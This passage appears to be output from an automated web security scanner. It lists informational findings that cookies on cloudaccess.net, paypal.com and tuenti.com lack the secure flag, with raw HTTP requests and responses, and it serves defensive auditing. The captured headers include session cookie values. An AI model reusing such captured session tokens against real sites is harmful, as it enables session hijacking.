Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=PC#1295637745501-300919.17#1296864738|check#true#1295655198|session#1295655081531-668160#1295656998; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:20 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:20 GMT;path=/
Content-Length: 637

var WEBSITE_URL = "www.bmwusa.com";
var WEB_SERVICES_URL = "ws.bmwusa.com";
var WCF_SERVICES_URL = "ws.bmwusa.com";
var RESOURCE_SERVER_URL = "cache.bmwusa.com";
var MOBILE_URL = "m.bmwusa.com";

...[SNIP]...

8.24. https://www.cloudaccess.net/copyright-policy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /copyright-policy.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:43 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /copyright-policy.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:43 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Last-Modified: Wed, 30 Jun 2010 18:23:53 GMT
Expires: Mon, 24 Jan 2011 16:19:44 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

8.25. https://www.cloudaccess.net/network-report.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /network-report.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:43 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /network-report.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:44 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Last-Modified: Thu, 23 Dec 2010 04:28:12 GMT
Expires: Mon, 24 Jan 2011 16:19:44 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

8.26. https://www.cloudaccess.net/network-sla.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /network-sla.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:45 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /network-sla.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Last-Modified: Tue, 30 Nov 1999 06:00:00 GMT
Expires: Mon, 24 Jan 2011 16:19:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

8.27. https://www.cloudaccess.net/privacy-policy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /privacy-policy.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:40 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy-policy.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:41 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:40 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Last-Modified: Wed, 30 Jun 2010 17:55:06 GMT
Expires: Mon, 24 Jan 2011 16:19:41 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

8.28. https://www.cloudaccess.net/support-sla.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /support-sla.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support-sla.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:47 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Last-Modified: Mon, 22 Nov 2010 16:52:12 GMT
Expires: Mon, 24 Jan 2011 16:19:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

8.29. https://www.cloudaccess.net/terms-of-service.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /terms-of-service.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:40 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /terms-of-service.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:41 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:40 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Last-Modified: Fri, 02 Jul 2010 09:07:32 GMT
Expires: Mon, 24 Jan 2011 16:19:41 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

8.30. https://www.paypal.com/cgi-bin/webscr

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paypal.com
Path:   /cgi-bin/webscr

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • Apache=10.190.8.167.1295914136420337; path=/; expires=Thu, 17-Jan-41 00:08:56 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/webscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:56 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=HjCqYFc5CXevJqotkFvMFXXfoIhvN4EW-tKQaiEr8amgJtib0LN-pmWtmu8m4ykzPAW2XZqlpMiPKRHK4wvHNGkR63CpLZRW66OIADyLhqUeCW3OJL35JwPuquu9XtupCaGbkm%7c7MTs5u44SsQwlwsvfYBCh-eN7c-WopQW6ARNbpWah9zCNwXi7WheWGQ_fSWzNJZRd5Af5W%7cqZnpbU6jjFBhsFea-10nNBdj15bLnQiVDM35QkeV0xMIv34GNGCo06XR8iUJDMZcLQxoK0%7c1295914136; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=DG0txL-D_ExP4tRfsCqsa40Ft5wDbFyjquJlxwVRFta791T3X2o2_RMTFJrbEaIkf1tYt_faGHrn0XU5; expires=Mon, 20-Jan-2031 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: cookie_check=yes; expires=Fri, 22-Jan-2021 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d7%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; expires=Fri, 22-Jan-2021 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Mon, 20-Jan-2031 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: Apache=10.190.8.167.1295914136420337; path=/; expires=Thu, 17-Jan-41 00:08:56 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25878

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!--

...[SNIP]...

8.31. https://www.tuenti.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tuenti.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
  • ourl=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com
  • manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com
